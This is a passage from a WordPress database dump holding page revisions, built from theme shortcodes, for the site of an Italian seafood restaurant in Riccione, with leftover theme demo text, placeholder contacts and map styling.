category=\"healthy\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2020-12-05 17:34:32','2020-12-05 16:34:32','',3040,'https://www.ristorantesolymar.it/2020/12/05/3040-revision-v1/',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (3360,1,'2020-12-05 17:42:11','2020-12-05 16:42:11','[vc_row el_class=\"main-home-first-row\"][vc_column][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"776\"][vc_column_inner][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"three-columns\" switch_to_one_column=\"1024\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"150px 0 181px 0\" item_padding_1367_1600=\"95px 8% 181px 8%\" item_padding_1025_1366=\"120px 6% 181px 6%\" item_padding_769_1024=\"42px 0 110px 0\" item_padding_681_768=\"30px 0 40px 0\" item_padding_680=\"15px 8% 50px 8%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1202\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item item_padding=\"50px 0 0 0\" item_padding_1367_1600=\"50px 0 0 0\" item_padding_1025_1366=\"0px 0 0 0\" item_padding_769_1024=\"0px 20% 0 20%\" item_padding_681_768=\"39px 17% 0 17%\" item_padding_680=\"15px 8% 0 8%\" custom_class=\"mkdf-reveal-from-left\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"1198\" image_size=\"full\"][/mkdf_elements_holder_item][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"150px 0 186px 29%\" item_padding_1367_1600=\"108px 0 186px 29%\" item_padding_1025_1366=\"127px 0 186px 29%\" item_padding_769_1024=\"53px 0 142px 56%\" item_padding_681_768=\"80px 0 157px 25%\" item_padding_680=\"77px 0% 67% 8%\"][mkdf_reservation_popup opener=\"rectangle-with-text\" open_table_id=\"161697\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row content_text_aligment=\"center\" el_class=\"main-home-second-row\"][vc_column width=\"1/3\" css=\".vc_custom_1533736057368{margin-top: -375px !important;}\"][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1533739073010{margin-top: -60px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0 0\" item_padding_680=\"287px 0 0 0\"][mkdf_menu_popup opener_skin=\"mkdf-menu-popup-light-opener\" number_of_columns=\"one\" column_one_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1536047365110{margin-top: -160px !important;}\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 13% 0\" item_padding_1367_1600=\"0 9% 0\" item_padding_1025_1366=\"0 7% 0\" item_padding_769_1024=\"0 10% 0\"][vc_row_inner css=\".vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}\" el_class=\"mkdf-reveal-from-left\"][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: center;\">Piatti di pesce tra tende e arredi bianchi in un elegante ristorante dallo stile provenzale sulla spiaggia</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/mkdf_elements_holder_item][/mkdf_elements_holder][vc_row_inner][vc_column_inner css=\".vc_custom_1535119322528{margin-top: -20px !important;}\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"2135\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534503338704{padding-top: 150px !important;}\"][vc_column][mkdf_portfolio_list type=\"trio\" space_between_items=\"normal\" enable_image_shadow=\"no\" orderby=\"date\" order=\"ASC\" item_style=\"trio-info-bottom-hover\" title_tag=\"h6\" category=\"food\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533811367372{margin-top: -306px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" left_parallax_background_element=\"149\" css=\".vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1533809912373{margin-top: -86px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"0 0 0 0\" item_padding_769_1024=\"0 15% 0 15%\" item_padding_681_768=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1199\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1533811471107{margin-top: -336px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"6px 21% 0 2%\" item_padding_1367_1600=\"66px 0% 0 27%\" item_padding_1025_1366=\"120px 0% 300px 20%\" item_padding_769_1024=\"54% 41% 28% 2%\" item_padding_681_768=\"73% 26% 35% 0%\" item_padding_680=\"131% 0% 95% 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_margin=\"49px 60px\" line_length=\"114px\" title=\"Chef’s Words\" title_break_words=\"1\" text=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras at neque sit amet ligula mattis mollis. Proin sed tempor elit. Proin at nisi tellus. Aenean iaculis, quam vel semper mollis, justo ipsum tempus erat, vel imperdiet diam magna vitae quam. Sed fermentum mollis felis sit amet ultricies. Fusce et erat massa. Sed sed varius purus. Maecenas dictum orci vulputate mattis tincidunt.\r\n\r\nMauris pretium lectus ante, vel aliquet nibh consectetur sed. Nam vel ligula vel turpis malesuada fermentum ut vitae quam. Praesent convallis metus nec mauris bibendum dapibus. Proin maximus ornare feugiat. Nulla a magna nec augue tincidunt condimentum. Donec elementum facilisis diam, et varius ante pellentesque et. Phasellus ac purus vulputate, accumsan mi a, convallis elit. Suspendisse potenti. Proin tempus justo eget tortor vehicula faucibus. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.\" text_margin=\"40px\"]Costante impegno, passione ,attenzione alla materia prima, tecnica, atmosfera dal 1994.\r\nCucina di Pesce, proposte vegetariane\r\nAperto tutto l\'anno[/mkdf_section_title][vc_empty_space height=\"55px\"][mkdf_button type=\"simple\" text=\"scopri il menu\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"0 0 0 59%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1533812953034{margin-top: -123px !important;}\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"middle\" enable_parallax_effect=\"no\" right_parallax_background_element=\"189\" css=\".vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}\"][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column css=\".vc_custom_1534769660562{margin-top: -190px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 5% 0 23%\" item_padding_1367_1600=\"60px 5% 0 17%\" item_padding_1025_1366=\"125px 0% 0 19%\" item_padding_769_1024=\"0px 5% 0 4%\" item_padding_681_768=\"0px 36% 0 0%\" item_padding_680=\"0px 0% 0 0%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Cucina di pesce\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]\r\n<div dir=\"auto\">e proposte vegetariane</div>\r\n[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"29px 0 0 21%\" item_padding_681_768=\"29px 33% 0 0%\" item_padding_680=\"35px 0 90% 0%\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 10% 0 0%\"][vc_empty_space height=\"124px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" enable_parallax=\"yes\" parallax_offset=\"30\" parallax_smoothness=\"40\" image=\"1177\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769683015{margin-top: -374px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"202px 0% 0px 27%\" item_padding_681_768=\"85% 20% 0% 0%\" item_padding_1025_1366=\"219px 0% 0px 25%\" item_padding_769_1024=\"185px 0% 0px 7%\" item_padding_680=\"202px 0% 0px 0%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_smoothness=\"40\" image=\"1178\" image_size=\"full\"][vc_empty_space height=\"100px\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" title=\"Haute Cuisine\" title_break_words=\"4\" line_length=\"0px\" text_margin=\"30px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat.[/mkdf_section_title][vc_empty_space height=\"30px\"][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"http://attika.mikado-themes.com/fine-dinning-concept/\" margin=\"30px 0% 0 56%\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1536913540691{padding-top: 130px !important;}\"][vc_column][mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday\r\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday\r\n6pm - 10:30pm (last order)\" button_link=\"https://www.opentable.com/r/ikoyi-reservations-london?restref=161697&amp;datetime=2018-08-28T19%3A00&amp;covers=1&amp;searchdatetime=2018-08-28T19%3A00&amp;partysize=1\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534769891217{margin-left: -50px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 35px 33%\" item_padding_1367_1600=\"0 0 35px 36%\" item_padding_1025_1366=\"0 0 35px 36%\" item_padding_769_1024=\"64px 0 87px 40%\" item_padding_681_768=\"63px 0 0px 18%\" item_padding_680=\"43px 0% 117px 22%\"][vc_column_text]\r\n<h3>Ristorante Sol Y Mar</h3>\r\n[/vc_column_text][vc_empty_space height=\"10px\"][vc_column_text]Via Lungomare D\'Annunzio\r\nRiccione[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column css=\".vc_custom_1534769906135{margin-top: -62px !important;}\" offset=\"vc_col-lg-6 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"12px 0 0 33%\" item_padding_769_1024=\"162px 0 0 15%\" item_padding_681_768=\"20% 0% 99px 49%\" item_padding_680=\"12px 12% 79px 12%\" item_padding_1025_1366=\"12px 0 0 30%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" enable_parallax=\"yes\" parallax_offset=\"20\" parallax_smoothness=\"30\" image=\"250\" image_size=\"full\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row css=\".vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"via Lungomare D\'Annunzio 190\" pin=\"257\" map_height=\"345px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1533133353763{padding-top: 100px !important;}\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"269\" image_size=\"full\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}\" el_class=\"mkdf-reveal-from-right\"][vc_column width=\"1/5\" offset=\"vc_hidden-md vc_hidden-sm vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Generic inquiries\" content_padding=\"124px 0\" email=\"info@attika.ny\" link=\"mailto:info@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Press\" content_padding=\"124px 0\" email=\"press@attika.ny\" link=\"mailto:press@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Job Inquiries\" content_padding=\"124px 0\" email=\"work@attika.ny\" link=\"mailto:work@attika.ny\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}\" offset=\"vc_col-lg-1/5 vc_col-md-3 vc_col-xs-12\"][mkdf_info_box title_tag=\"h5\" box_background_color=\"#fef8f7\" title=\"Events\" content_padding=\"124px 0\" email=\"events@attika.ny\" link=\"mailto:events@attika.ny\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"60px 2% 50px 24%\" item_padding_769_1024=\"12px 0% 57px 2%\" item_padding_681_768=\"20px 0% 70px 0%\" item_padding_680=\"0px 0% 70px 0%\" item_padding_1367_1600=\"60px 1% 50px 24%\" item_padding_1025_1366=\"60px 1% 50px 24%\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h2\" disable_break_words=\"no\" line_length=\"120px\" title=\"Read Our Blog\" title_break_words=\"1,2\" line_margin=\"30px 45px\" text_margin=\"100px\" text_right_padding=\"0\" holder_padding=\"0\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula. Pellentesque vitae enim fringilla, consequat nulla nec, fringilla ligula.[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_blog_list type=\"standard\" space_between_items=\"small\" orderby=\"date\" order=\"ASC\" image_size=\"full\" number_of_posts=\"4\" category=\"healthy\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_single_image enable_image_shadow=\"no\" center_image=\"yes\" image=\"324\" image_size=\"full\"][/vc_column][/vc_row]','Main Home','','inherit','closed','closed','','3040-revision-v1','','','2020-12-05 17:42:11','2020-12-05 16:42:11','',3040,'https://www.ristorantesolymar.it/2020/12/05/3040-revision-v1/',0,'revision','',0),(3361,1,'2020-12-05 17:46:31','2020-12-05 16:46:31','[vc_row css=\".vc_custom_1533717792911{padding-top: 150px !important;padding-bottom: 150px !important;}\"][vc_column][vc_row_inner row_content_width=\"grid\" enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" enable_parallax_effect=\"no\" left_parallax_background_element=\"696\" right_parallax_background_element=\"697\"][vc_column_inner width=\"5/6\" css=\".vc_custom_1534508595924{margin-top: -130px !important;}\" offset=\"vc_col-lg-6 vc_col-md-10 vc_col-xs-12\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" line_length=\"115px\" title=\"Accolades\" title_break_words=\"1\" text=\"\" line_margin=\"60px 9% 0 18%\" holder_padding=\"0 0 15% 0\" text_margin=\"50px\" text_right_padding=\"0\"]One Michelin star, 2017 Michelin Guide New York[vc_empty_space height=\"30px\"]One Michelin star, 2017 Michelin Guide New York[vc_empty_space height=\"30px\"]Indoguna Best Restaurant 2015, World Gourmet Summit[vc_empty_space height=\"30px\"]Eurocave Old World Wine List of the Year 2015,\nWorld Gourmet Summit[vc_empty_space height=\"30px\"]Best New Restaurant 2014 (Western), The Peak Gourmet and Travel[vc_empty_space height=\"30px\"]San Pellegrino Best New Restaurant 2014, World Gourmet Summit[vc_empty_space height=\"30px\"]\nBest Western Wine List 2014, Wine &amp; Dine[/mkdf_section_title][vc_empty_space height=\"200px\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"703\" image_size=\"full\"][vc_empty_space height=\"50px\"][/vc_column_inner][vc_column_inner width=\"1/6\" offset=\"vc_col-lg-6 vc_col-md-2 vc_hidden-xs\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]','Accolades','','inherit','closed','closed','','3054-revision-v1','','','2020-12-05 17:46:31','2020-12-05 16:46:31','',3054,'https://www.ristorantesolymar.it/2020/12/05/3054-revision-v1/',0,'revision','',0),(3362,1,'2020-12-05 17:47:28','2020-12-05 16:47:28','[vc_row content_placement=\"bottom\" row_content_width=\"grid\" css=\".vc_custom_1535113284246{padding-top: 130px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-4 vc_col-md-6 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0px 0\" item_padding_1367_1600=\"0 0 0px 0\" item_padding_1025_1366=\"0 0 0px 0\" item_padding_769_1024=\"0 0 0px 0\" item_padding_681_768=\"0 0 20px 0\" item_padding_680=\"0 0 30px 0\"][mkdf_section_title type=\"standard\" position=\"left\" title_tag=\"\" disable_break_words=\"no\" text_tag=\"\" text_font_weight=\"\" line_length=\"120px\" title=\"Contact Us\" title_break_words=\"1\" text=\"Attica Fine Dining Restaurant\nRainbow Ridge Dr street 35\nNY City, NY\" text_margin=\"45px\" line_margin=\"50px 14% 5% 20%\"]Attika Fine Dining Restaurant\nRainbow Ridge Dr street 35\nNY City, NY[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][vc_column width=\"1/12\" offset=\"vc_hidden-md vc_hidden-xs\"][/vc_column][vc_column width=\"1/3\" offset=\"vc_col-lg-2 vc_col-md-3\"][vc_column_text]Phone:\n\n<a href=\"tel:+445135340089\">+445135340089</a>\n<a href=\"tel:+4540183 293763\">+4540183 293763</a>\n<a href=\"tel:+454 338 2748123\">+454 338 2748123</a>[/vc_column_text][vc_empty_space height=\"15px\"][/vc_column][vc_column width=\"1/6\" offset=\"vc_col-lg-1 vc_hidden-md vc_hidden-xs\"][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-lg-4 vc_col-md-3\"][vc_column_text]Email:\n\n<a href=\"mailto:info@attikarestaurant.ny\">info@attikarestaurant.ny</a>\n<a href=\"mailto:info@attika.ny\">info@attika.ny</a>[/vc_column_text][vc_empty_space height=\"45px\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1534171353151{padding-top: 65px !important;padding-bottom: 130px !important;}\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"Brit Sec Limited, 99 Bishopsgate, London EC2M 3XD, UK\" zoom=\"18\" map_height=\"345\" pin=\"224\" snazzy_map_code=\"`{`\n{\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``elementType``: ``labels.icon``,\n``stylers``: `{`\n{\n``visibility``: ``off``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.stroke``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``featureType``: ``administrative.land_parcel``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#bdbdbd``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``road``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#ffffff``\n}\n`}`\n},\n{\n``featureType``: ``road.arterial``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#dadada``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``featureType``: ``road.local``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``transit.line``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``transit.station``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#c9c9c9``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n}\n`}`\"][/vc_column][/vc_row]','Contact Us','','inherit','closed','closed','','3049-revision-v1','','','2020-12-05 17:47:28','2020-12-05 16:47:28','',3049,'https://www.ristorantesolymar.it/2020/12/05/3049-revision-v1/',0,'revision','',0),(3363,1,'2020-12-05 17:49:39','2020-12-05 16:49:39','<p>[vc_row][vc_column][rev_slider_vc alias=\"home\" enable_paspartu=\"no\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\" css=\".vc_custom_1535368696442{padding-top: 123px !important;padding-bottom: 90px !important;}\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"5/6\"][mkdf_section_title type=\"standard\" position=\"\" title_tag=\"h3\" disable_break_words=\"no\" title=\"visual pleasures\" text_margin=\"30px\" line_length=\"0px\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis et nulla vitae nunc molestie laoreet. Aliquam at malesuada eros. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed quis aliquet ligula. Interdum et malesuada fames ac ante ipsum primis in faucibus. Donec urna justo, mollis ut vestibulum.[/mkdf_section_title][vc_row_inner content_text_aligment=\"right\"][vc_column_inner][mkdf_button type=\"simple\" text=\"see more\" target=\"_self\" icon_pack=\"\" font_weight=\"\" text_transform=\"\" link=\"#\" margin=\"53px 0% 0 0%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row full_height=\"yes\" equal_height=\"yes\" content_text_aligment=\"center\" css=\".vc_custom_1536934540610{padding-top: 100px !important;padding-bottom: 100px !important;}\" simple_background_color=\"#e7dfdf\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_portfolio_slider enable-center=\"no\" enable-auto-width=\"no\" number_of_columns=\"one\" space_between_items=\"no\" image_proportions=\"full\" orderby=\"date\" order=\"ASC\" enable_fullheight=\"no\" portfolio_slider_full_height_decrease=\"no\" item_style=\"gallery-overlay\" title_tag=\"h6\" enable_category=\"no\" enable_loop=\"yes\" enable_autoplay=\"yes\" enable_navigation=\"yes\" enable_navigation_numbers=\"yes\" navigation_number_position=\"outer\" navigation_skin=\"dark\" enable_pagination=\"no\" 